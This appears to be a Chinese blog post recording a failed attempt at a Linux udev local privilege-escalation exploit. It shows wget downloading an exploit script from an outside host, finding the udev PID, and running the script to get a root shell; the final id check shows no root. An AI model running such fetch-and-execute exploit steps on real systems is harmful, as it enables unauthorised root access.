• Linux UDEV提权过程


    1.下载攻击脚本

    [test@H0f ~]$ wget http://www.extmail .org/source/exploit-udev-8478
    --2018-04-02 01:21:00--  http://www.extmail/
    Resolving www.extmail... failed: Name or service not known.
    wget: unable to resolve host address “www.extmail”
    --2018-04-02 01:21:00--  http://.org/source/exploit-udev-8478
    Resolving .org... failed: Name or service not known.
    wget: unable to resolve host address “.org”
    [test@H0f ~]$ wget http://www.extmail.org/source/exploit-udev-8478
    --2018-04-02 01:21:14--  http://www.extmail.org/source/exploit-udev-8478
    Resolving www.extmail.org... 124.172.184.131
    Connecting to www.extmail.org|124.172.184.131|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 3367 (3.3K) [application/octet-stream]
    Saving to: “exploit-udev-8478”
    
    100%[===============================================================================>
    
    2018-04-02 01:21:15 (351 KB/s) - “exploit-udev-8478” saved [3367/3367]
    

     2.获得udev进程号

    [test@H0f ~]$ ps ax|grep udev|grep -v grep|awk {'print $1'}
    581
    2508
    2509

    3.获得udev进程号,然后将此数字减1作为exploit-udev-8478的参数,执行脚本

    [test@H0f ~]$ sh exploit-udev-8478 580 
    suid.c: In function ‘main’:
    suid.c:3: warning: incompatible implicit declaration of built-in function ‘execl’
    

    4.输入id进行验证

    1 sh-4.1$ id
    2 uid=502(test) gid=502(test) groups=502(test) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

    多次实验仍未成功,大佬看到求指点,应该是我的linux版本问题把

  • 相关阅读:
    CentOS安装部署Nodejs
    CentOS安装部署Git
    CentOS安装部署Mysql 5.7
    CentOS 7 安装Java环境(脚本一键式安装)
    Java技术 | 细谈Java中UUID的简单了解与使用
    Navicat Premium 版本 12.1 激活成永久
    Java技术 | 细谈 Java 8 中的 Base64
    安装部署Elastic Search
    从零开始搭建linux下laravel 5.5所需环境(二)
    从零开始搭建linux下laravel 5.5所需环境(一)
  • 原文地址:https://www.cnblogs.com/someone9/p/8696057.html
Copyright © 2020-2023  润新知